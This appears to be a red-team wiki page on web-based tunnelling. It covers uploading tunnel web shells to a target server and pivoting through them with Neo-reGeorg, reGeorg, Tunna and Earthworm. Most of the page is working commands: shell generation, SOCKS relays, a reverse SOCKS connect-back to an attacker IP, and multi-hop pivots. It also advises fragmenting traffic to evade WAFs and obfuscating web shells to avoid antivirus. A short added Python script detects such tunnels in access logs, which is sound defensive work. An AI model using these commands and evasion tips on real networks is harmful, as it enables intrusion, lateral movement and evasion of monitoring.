# Web-Based Tunnels

## Overview

When the target network allows only HTTP/HTTPS outbound, web-based tunnels encapsulate SOCKS traffic inside HTTP requests. They matter when plain SOCKS proxies and SSH tunnels are blocked by egress filtering. A tunnel web shell (JSP, PHP, ASPX) is uploaded to the target web server; a client on the attacker's machine then opens a local SOCKS listener and relays each proxied connection as a series of HTTP requests and responses to that script, which makes the onward TCP connections from inside the network.
## Tool Comparison

| Tool | Language Support | Protocol | Speed | Detectability |
|---|---|---|---|---|
| Neo-reGeorg | JSP, PHP, ASPX, ASHX | HTTP/HTTPS tunnel | Fast | Medium |
| reGeorg | JSP, PHP, ASPX | HTTP tunnel | Medium | High (legacy signatures) |
| Tunna | PHP, ASPX, JSP | HTTP tunnel | Slow | High |
| Earthworm | Binary (Windows/Linux) | SOCKS5, lcx, ssocks | Fast | Low |
## Neo-reGeorg

The modern successor to reGeorg, with encrypted traffic, password protection, and better performance.
### Setup

```bash
# Install
git clone https://github.com/L-codes/Neo-reGeorg.git
cd Neo-reGeorg
pip3 install -r requirements.txt

# Generate tunnel web shells bound to a password (the client script is neoreg.py)
python3 neoreg3.py generate -k <password> 2>/dev/null || python3 neoreg.py generate -k <password>

# This creates a directory with tunnel scripts:
# tunnel.php, tunnel.jsp, tunnel.aspx, tunnel.ashx

# Upload the appropriate script to the target web server
# E.g., upload tunnel.aspx to http://target/upload/
```
### Running

```bash
# Start the SOCKS proxy through the web shell (same key used at generate time)
python3 neoreg.py -k <password> -u http://target/upload/tunnel.aspx

# Default SOCKS proxy listens on 127.0.0.1:1080
# Use with proxychains
proxychains4 nmap -sn 172.16.0.0/24

# Custom local bind address and SOCKS port
python3 neoreg.py -k <password> -u http://target/upload/tunnel.aspx -l 0.0.0.0 -p 9050

# Longer polling interval in milliseconds (fewer requests per second, lower volume signature)
python3 neoreg.py -k <password> -u http://target/upload/tunnel.aspx --read-interval 500

# HTTPS target; -s skips the initial usability self-test if it fails behind a WAF
python3 neoreg.py -k <password> -u https://target/upload/tunnel.aspx -s
```
### Neo-reGeorg Features

- Password protection: the tunnel script only responds to requests carrying the key
- Custom headers: set User-Agent, cookies, and other headers to blend with normal traffic
- Request fragmentation: split large requests to avoid WAF detection
- Response obfuscation: encode tunnel responses to avoid DLP inspection
## reGeorg (Legacy)

The original HTTP tunnel tool. Still useful on older targets, but more detectable.

```bash
# Install
git clone https://github.com/sensepost/reGeorg.git
cd reGeorg
pip3 install -r requirements.txt

# Upload tunnel.jsp/php/aspx to target

# Run SOCKS proxy
python reGeorgSocksProxy.py -u http://target/upload/tunnel.jsp -p 1080

# Use with proxychains
proxychains4 nmap -sn 172.16.0.0/24
```
## Tunna

A PHP/ASPX/JSP web shell tunnel that uses a different encoding method from reGeorg.

```bash
# Install
git clone https://github.com/SECFORCE/Tunna.git
cd Tunna

# Run SOCKS proxy through PHP web shell
python proxy.py -u http://target/upload/conn.php -l 1080

# Through ASPX web shell
python proxy.py -u http://target/upload/conn.aspx -l 1080

# With specific remote host/port (direct forward, no SOCKS)
python proxy.py -u http://target/upload/conn.php -l 8080 -r 172.16.0.10 -rd 80
```
## Earthworm (EW)

Earthworm is a Chinese pentest tool that provides multiple tunneling modes: SOCKS proxy, port forwarding, and relay chaining. It's widely used in APAC assessments.

```bash
# Download Earthworm binary
# https://github.com/idlebroker/earthworm

# ── Mode 1: SOCKS5 Server (ssocksd) ──
# Run on the pivot host; clients connect directly to pivot:1080
ew -s ssocksd -l 1080

# ── Mode 2: Reverse SOCKS5 (rcsocks + rssocks) ──
# Attacker: listen on 1080 for SOCKS clients, on 8888 for the pivot's call-back
ew -s rcsocks -l 1080 -e 8888
# Pivot: connect back to the attacker's 8888 and serve SOCKS over that link
ew -s rssocks -d <attacker_ip> -e 8888

# ── Mode 3: Port Forwarding (lcx_tran) ──
# Listen locally on 1080 and forward through the pivot to target:3389
ew -s lcx_tran -l 1080 -f 172.16.0.10 -g 3389

# ── Mode 4: Port Relay (lcx_slave) ──
# Pivot connects two endpoints together: attacker:8888 <-> 172.16.0.10:3389
ew -s lcx_slave -d <attacker_ip> -e 8888 -f 172.16.0.10 -g 3389

# ── Mode 5: Port Listener (lcx_listen) ──
# Listen on a port and bridge it to the port an lcx_slave connects to
ew -s lcx_listen -l 1080 -e 8888
```
### Earthworm Multi-Hop

```bash
# Double pivot with Earthworm:
# Attacker -> Pivot1 -> Pivot2 -> Target

# Pivot2: SOCKS server on the internal network
ew -s ssocksd -l 1080

# Pivot1: relay the attacker's 9999 to pivot2's SOCKS port
ew -s lcx_slave -d <attacker_ip> -e 9999 -f <pivot2_ip> -g 1080

# Attacker: listen on 1080 for SOCKS clients and on 9999 for pivot1's connection
ew -s lcx_listen -l 1080 -e 9999

# Now use the SOCKS proxy on attacker:1080
proxychains4 nmap -sn 172.16.0.0/24
```
## Common Pitfalls

- Web shell upload blocked: if you can't upload files to the web server, web tunnels won't work. Try other egress methods (DNS, ICMP).
- WAF blocks tunnel traffic: some WAFs detect and block reGeorg/Neo-reGeorg patterns. Use Neo-reGeorg with custom headers and fragmentation.
- Slow performance: HTTP tunnels are inherently slower than a direct SOCKS or SSH tunnel, because every chunk of data costs a full HTTP request/response round trip. Expect 10-100x slower than direct SOCKS.
- Connection timeouts: long-running connections over HTTP tunnels may time out. Use keep-alive or reconnect logic.
- Web shell detection: antivirus and file integrity monitors may detect the web shell. Obfuscate the script or use legitimate-looking file names.
## OPSEC Considerations

- Web tunnels generate unusual HTTP traffic patterns (high volume, frequent requests to one endpoint)
- WAF and DLP systems can detect tunnel signatures (reGeorg in particular has known signatures)
- The uploaded web shell is a persistent artifact that may be discovered
- Use HTTPS to prevent traffic inspection, and password-protect the tunnel (Neo-reGeorg)
- Clean up the web shell after the engagement
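The first OPSEC point above is also the defender's handle on this technique: a polling tunnel shows up in the web server's own access log as one client hammering one script with small POSTs at a near-constant interval. The following script is an added example, not code from the page or from any of the tools above; it parses Apache/Nginx combined-format log lines (the sample lines are constructed, with RFC 5737 documentation addresses and the `/upload/tunnel.aspx` path used earlier on the page) and flags (client, path) pairs that match at least two of three signals: short mean gap between requests, low variance in that gap, and a high POST ratio. Thresholds are assumptions to tune per site; a legitimate health-check poller trips only the "near-constant interval" signal and is therefore not flagged.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

# Combined log format as written by Apache and Nginx by default:
# ip - - [day/Mon/year:HH:MM:SS zone] "METHOD /path HTTP/x" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore query strings when grouping
    return rec


def score_endpoints(lines, min_requests=20, max_mean_gap=2.0, min_post_ratio=0.8):
    """Group requests by (client, path) and flag groups that behave like a polling tunnel.

    Thresholds are assumptions for illustration; tune them against your own baseline.
    """
    groups = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[(rec["ip"], rec["path"])].append(rec)

    findings = []
    for (ip, path), recs in groups.items():
        if len(recs) < min_requests:
            continue  # too few requests to say anything about cadence
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        avg_gap = mean(gaps)
        post_ratio = sum(r["method"] == "POST" for r in recs) / len(recs)

        reasons = []
        if avg_gap <= max_mean_gap:
            reasons.append(f"mean gap {avg_gap:.2f}s")
        if pstdev(gaps) < 0.25 * max(avg_gap, 1e-9):
            reasons.append("near-constant interval")
        if post_ratio >= min_post_ratio:
            reasons.append(f"POST ratio {post_ratio:.2f}")

        # Require two independent signals so a lone periodic GET poller is not flagged.
        if len(reasons) >= 2:
            findings.append({"client": ip, "path": path, "requests": len(recs), "reasons": reasons})
    return findings


def make_sample_lines():
    """Constructed sample log: one tunnel client, one benign monitor, some browsing."""
    base = datetime(2024, 5, 1, 10, 0, 0, tzinfo=timezone.utc)

    def stamp(t):
        return t.strftime("%d/%b/%Y:%H:%M:%S %z")

    lines = []
    for i in range(30):  # tunnel client: one small POST per second to the same script
        lines.append(f'203.0.113.7 - - [{stamp(base + timedelta(seconds=i))}] '
                     f'"POST /upload/tunnel.aspx HTTP/1.1" 200 513')
    for i in range(25):  # benign monitor: GET every 30 s (constant interval, but GET)
        lines.append(f'198.51.100.5 - - [{stamp(base + timedelta(seconds=30 * i))}] '
                     f'"GET /api/status HTTP/1.1" 200 42')
    for i in range(5):   # ordinary browsing: too few requests to score
        lines.append(f'198.51.100.9 - - [{stamp(base + timedelta(seconds=60 * i))}] '
                     f'"GET /index.html HTTP/1.1" 200 2048')
    return lines


if __name__ == "__main__":
    for f in score_endpoints(make_sample_lines()):
        print(f"{f['client']} -> {f['path']}: {f['requests']} requests; " + ", ".join(f["reasons"]))
```

On real logs, feed `score_endpoints` the lines of a rotated access log and raise the thresholds to match normal traffic; the combination of a single script receiving a steady stream of small POSTs from one client is the pattern reGeorg-style tunnels cannot avoid even when headers and bodies are customised, and it is a reasonable first triage query before looking at the uploaded file itself.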
## Cross-References

- DNS & Protocol Tunnels — when even HTTP is blocked
- SOCKS & HTTP Proxies — standard SOCKS proxies (faster, when available)
- Cloud Tunnels — cloud-based alternatives
- 07 - Post-Exploitation — foundational pivoting